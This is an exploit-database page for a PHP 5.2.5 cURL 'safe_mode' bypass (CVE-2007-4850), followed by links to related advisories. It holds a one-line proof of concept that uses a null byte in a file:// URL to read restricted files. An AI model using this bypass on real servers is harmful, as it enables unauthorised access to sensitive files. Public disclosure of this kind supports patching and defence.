Lucene search
Maksymilian ArciemowiczEDB-ID:31053HistoryJan 23, 2008 - 12:00 a.m.
PHP 5.2.5 - cURL 'safe_mode' Security Bypass
2008-01-2300:00:00
Maksymilian Arciemowicz
www.exploit-db.com
26
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/27413/info
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
The issue affects PHP 5.2.5 and 5.2.4.
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); Related
securityvulns
securityvulns
PHP safe mode bypass vulneraebility
2009-04-12 00:00:00
PHP 5.2.5 cURL safe_mode bypass
2008-01-24 00:00:00
cve
cve
CVE-2007-4850
2008-01-25 01:00:00
ubuntucve
ubuntucve
CVE-2007-4850
2008-01-24 00:00:00
nvd
nvd
CVE-2007-4850
2008-01-25 01:00:00
seebug
seebug
PHP cURL 'safe mode'安全绕过漏洞
2008-01-25 00:00:00
prion
prion
Code injection
2008-01-25 01:00:00
cvelist
cvelist
CVE-2007-4850
2008-01-25 00:00:00
openvas
openvas
Mandrake Security Advisory MDVSA-2009:065 (php4)
2009-03-07 00:00:00
Mandrake Security Advisory MDVSA-2009:065 (php4)
2009-03-07 00:00:00
PHP < 4.4.9 Multiple Vulnerabilities
2012-06-21 00:00:00
nessus
nessus
PHP < 4.4.9 Multiple Vulnerabilities
2008-08-08 00:00:00
PHP < 5.2.6 Multiple Vulnerabilities
2008-05-02 00:00:00
Mandriva Linux Security Advisory : php (MDVSA-2009:022)
2009-04-23 00:00:00
ubuntu
ubuntu
PHP vulnerabilities
2008-07-23 00:00:00